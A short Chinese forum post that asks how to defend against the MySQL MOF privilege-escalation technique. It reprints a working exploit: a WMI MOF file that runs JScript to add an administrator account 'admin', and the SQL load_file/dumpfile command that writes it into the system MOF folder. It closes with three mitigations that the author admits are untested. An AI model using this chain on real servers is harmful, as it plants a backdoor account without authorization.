Mysql mof扩展漏洞如何防范?
Mysql mof扩展漏洞如何防范?
网上公开的一些利用代码:
- #pragma namespace(“\\.\root\subscription”)
- instance of __EventFilter as $EventFilter
- {
- EventNamespace = “Root\Cimv2″;
- Name = “filtP2″;
- Query = “Select * From __InstanceModificationEvent ”
- “Where TargetInstance Isa ”Win32_LocalTime” ”
- “And TargetInstance.Second = 5″;
- QueryLanguage = “WQL”;
- };
- instance of ActiveScriptEventConsumer as $Consumer
- {
- Name = “consPCSV2″;
- ScriptingEngine = “JScript”;
- ScriptText =
- “var WSH = new ActiveXObject(”WScript.Shell”)nWSH.run(”net.exe user admin admin /add”)”;
- };
- instance of __FilterToConsumerBinding
- {
- Consumer = $Consumer;
- Filter = $EventFilter;
- };
复制代码
连接mysql数据库后执行:
select load_file(‘C:\RECYCLER\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
从上面代码来看得出解决办法:
1、mysql用户权限控制,禁止 "load_file"、"dumpfile"等函数
2、 禁止使用"WScript.Shel"组件
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
以上未经测试,纯属个人看法。